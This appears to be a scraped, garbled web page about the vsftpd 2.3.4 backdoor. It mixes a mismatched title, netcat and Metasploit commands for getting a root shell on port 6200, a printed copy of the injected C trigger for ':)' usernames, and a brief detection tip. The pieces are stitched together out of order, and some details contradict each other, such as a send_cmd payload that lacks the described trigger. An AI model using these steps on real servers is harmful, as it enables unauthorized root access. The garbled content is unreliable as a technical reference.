Vsftpd 208 Exploit Github Install Work
The backdoor code injected into the compromised VSFTPD source code monitors incoming FTP connection requests.
nc target.com 6200
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
nc 6200
# You now have a root command prompt
id
# uid=0(root) gid=0(root) groups=0(root)

3. Exploitation via Metasploit Framework
# Send the malicious FTP command
send_cmd(['USER', 'A'*1024 + "\x00"], false)
/* Backdoor check: a ":)" pair in the supplied string calls the hidden routine. */
int vsf_sysutil_extra();

if ((str[i] == ':') && (str[i+1] == ')'))
{
  vsf_sysutil_extra();
}
When a client attempts to authenticate to the compromised vsftpd service, the daemon checks the username. If the username contains the characters :), the software triggers a hidden routine. It forks a new process. It binds a root shell (/bin/sh) to TCP port 6200.
The backdoor is triggered when a user attempts to log in with a username that ends with the characters :) (a smiley face).
If you see a process listening on 6200, your server has been exploited. Kill the process and investigate.